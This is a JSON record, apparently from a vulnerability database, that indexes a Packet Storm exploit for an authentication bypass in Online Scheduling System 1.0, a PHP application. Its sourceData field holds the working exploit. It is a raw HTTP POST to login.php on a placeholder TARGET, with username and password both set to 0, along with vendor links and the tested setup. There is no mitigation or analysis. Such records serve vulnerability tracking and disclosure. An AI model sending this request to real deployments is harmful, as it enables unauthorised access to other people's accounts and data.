{"id": "PACKETSTORM:157511", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Online Scheduling System 1.0 Authentication Bypass", "description": "", "published": "2020-04-30T00:00:00", "modified": "2020-04-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/157511/Online-Scheduling-System-1.0-Authentication-Bypass.html", "reporter": "Bobby Cooke", "references": [], "cvelist": [], "lastseen": "2020-05-02T23:26:21", "viewCount": 36, "enchantments": {"dependencies": {}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/157511/onliness10-bypass.txt", "sourceData": "`# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass \n# Exploit Author: Bobby Cooke \n# Date: 2020-04-30 \n# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html \n# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip \n# Version: 1.0 \n# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 \n \n# Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1 \nPOST /Online%20Scheduling%20System/login.php HTTP/1.1 \nHost: TARGET \nConnection: close \nCookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 \n \nusername=0&password=0&lgn=Login \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645792059, "score": 1659818015}, "_internal": {"score_hash": "99a3f623d2723b6185a802d9fd2a21b7"}}
{}